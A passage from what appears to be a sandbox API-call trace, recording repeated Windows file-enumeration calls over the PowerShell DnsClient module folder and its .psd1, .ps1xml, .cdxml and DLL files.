ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="dnslookup.dll", cAlternateFileName="")) returned 1 [0176.977] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1198, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClient.cdxml", cAlternateFileName="")) returned 1 [0176.978] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1022, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientCache.cdxml", cAlternateFileName="")) returned 1 [0176.978] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0176.978] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientServerAddress.cdxml", cAlternateFileName="")) returned 1 [0176.978] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1444, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTGlobal_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0176.978] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNrptPolicy_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0176.978] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0176.979] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 0 [0176.979] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0176.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.980] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0176.980] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", lpFilePart=0x0) returned 0x3d [0176.980] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0176.981] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.981] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x68d, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient.psd1", cAlternateFileName="")) returned 1 [0176.982] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.982] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Types.ps1xml", cAlternateFileName="")) returned 1 [0176.982] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf0c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.982] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5687, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Types.ps1xml", cAlternateFileName="")) returned 1 [0176.982] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.982] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Types.ps1xml", cAlternateFileName="")) returned 1 [0176.982] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="dnslookup.dll", cAlternateFileName="")) returned 1 [0176.983] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1198, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClient.cdxml", cAlternateFileName="")) returned 1 [0176.983] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1022, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientCache.cdxml", cAlternateFileName="")) returned 1 [0176.983] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0176.983] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientServerAddress.cdxml", cAlternateFileName="")) returned 1 [0176.983] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1444, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTGlobal_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0176.983] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNrptPolicy_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0176.984] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0176.984] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0176.984] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0176.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.985] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0176.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0176.985] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0176.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0176.985] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0176.985] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", lpFilePart=0x0) returned 0x3d [0176.985] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0176.986] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.986] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x68d, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient.psd1", cAlternateFileName="")) returned 1 [0176.987] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.987] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Types.ps1xml", cAlternateFileName="")) returned 1 [0176.987] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf0c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.987] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5687, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Types.ps1xml", cAlternateFileName="")) returned 1 [0176.987] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.987] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Types.ps1xml", cAlternateFileName="")) returned 1 [0176.988] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="dnslookup.dll", cAlternateFileName="")) returned 1 [0176.988] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1198, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClient.cdxml", cAlternateFileName="")) returned 1 [0176.988] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1022, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientCache.cdxml", cAlternateFileName="")) returned 1 [0176.988] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0176.989] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientServerAddress.cdxml", cAlternateFileName="")) returned 1 [0176.989] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, 